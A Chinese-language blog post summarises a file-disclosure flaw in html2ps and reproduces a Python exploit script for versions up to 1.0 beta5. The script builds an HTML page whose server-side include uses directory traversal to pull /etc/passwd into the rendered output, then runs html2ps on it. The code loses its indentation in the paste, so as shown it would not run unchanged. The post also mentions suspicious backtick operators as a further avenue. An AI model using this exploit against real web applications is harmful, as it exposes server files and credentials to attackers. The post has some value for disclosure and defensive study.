该博客讨论了HTML2PS软件中一个安全漏洞,该漏洞允许任意文件披露。通过`includefile`指令,攻击者可以读取服务器上的任意文件,如`/etc/passwd`。默认配置下,如果`ssi`设置为1,这个漏洞就会生效。作者还提到了可能的利用方式,并警告了一些看起来可疑的后_tick_操作符。博客结尾提到了一些安全研究者的名称,并展示了利用漏洞的Python代码示例。
#!/usr/bin/env python
#
# html2ps <= 1.0 beta5 arbitrary file disclosure
# http://user.it.uu.se/~jan/html2ps.html
# author: epiphant <epiphant.0@gmail.com>
#
# the "include file" ssi directive doesn't check for directory
# traversal so you can include and disclose any file in the
# dir tree (very handy when html2ps is running as a part of a
# web app with data that you control)
# the vuln requires that "ssi" in the @html2ps block in the
# html2psrc file is set to 1, which is the default
#
# bonus info: some of the backtick operators look shady too
# but will require lots of prerequisites so they're uncool
#
# shouts: thcx labs, zybadawg333, fabiodds, str0ke
# jan k: shame on you - your perl is very ugly
#
import os
d = """\
<html>
<head>
<title>epiphant</title>
</head>
<body>
<h1>epiphant</h1>
<!--#include file="../../../../../../../etc/passwd"-->
<p>epiphant</p>
</body>
</html>
"""
try:
fi = open("epiphant.html", "w")
fi.write(d)
fi.close()
except:
print "can't write here"
exit(1)
os.system("html2ps epiphant.html > epiphant.ps")
os.system("gv epiphant.ps")
exit(0)
3044
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
